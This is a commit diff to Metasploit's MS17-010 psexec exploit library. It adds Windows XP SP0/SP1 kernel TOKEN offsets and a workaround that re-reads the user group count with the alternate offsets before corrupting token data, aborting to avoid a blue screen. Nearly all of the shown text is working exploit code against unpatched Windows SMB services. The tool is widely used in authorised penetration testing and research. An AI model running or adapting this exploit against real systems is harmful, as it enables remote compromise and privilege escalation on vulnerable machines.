hopefully fixed XP SP0/SP1 issues

2018-01-29 19:11:30 -07:00 · 2018-01-29 19:11:30 -07:00 · 7007bc1444
parent cfb7aa6de7
commit 7007bc1444
1 changed files with 20 additions and 1 deletions
--- a/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb
+++ b/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb
@ -124,6 +124,23 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010

      userAndGroupCount = tokenData[@ctx['TOKEN_USER_GROUP_CNT_OFFSET']..-1].unpack("V")[0] #unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET'])[0]
      userAndGroupsAddr = tokenData[@ctx['TOKEN_USER_GROUP_ADDR_OFFSET']..-1].unpack(fmt)[0] #unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
+
+      if @ctx['os'] == 'WINXP' and @ctx['arch'] == 'x86'
+        if userAndGroupCount > 4 or userAndGroupCount == 0 # check NULL too
+          print_error("Bad TOKEN offsets detected (group count = #{userAndGroupCount}), performing workaround...")
+          @ctx['TOKEN_USER_GROUP_CNT_OFFSET'] = @ctx['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']
+          @ctx['TOKEN_USER_GROUP_ADDR_OFFSET'] = @ctx['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1']
+
+          userAndGroupCount = tokenData[@ctx['TOKEN_USER_GROUP_CNT_OFFSET']..-1].unpack("V")[0]
+          userAndGroupsAddr = tokenData[@ctx['TOKEN_USER_GROUP_ADDR_OFFSET']..-1].unpack(fmt)[0]
+
+          # hopefully its not bad anymore
+          if userAndGroupCount > 4 or userAndGroupCount == 0 # check NULL too
+            raise MS17_010_Error, 'Bad TOKEN offsets after workround (group count = #{userAndGroupCount})... Abort > BSOD'
+          end
+        end
+      end
+
      vprint_status("UserAndGroupCount: 0x#{userAndGroupCount.to_s}")
      vprint_status("UserAndGroupsAddr: 0x#{userAndGroupsAddr.to_s(16)}")

@ -183,7 +200,7 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010

  def read_data(read_addr, read_size)
    if read_addr == 0
-      raise MS17_010_Error, 'Attempted to read from a NULL pointer!'      
+      raise MS17_010_Error, 'Attempted to read from a NULL pointer!'
    end

    fmt = @ctx['PTR_FMT']
@ -1190,6 +1207,8 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
      'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
      'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
      'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
+      'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'=> 0x40,
+      'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'=> 0x5c,
    }

    WIN2K_32_SESSION_INFO = {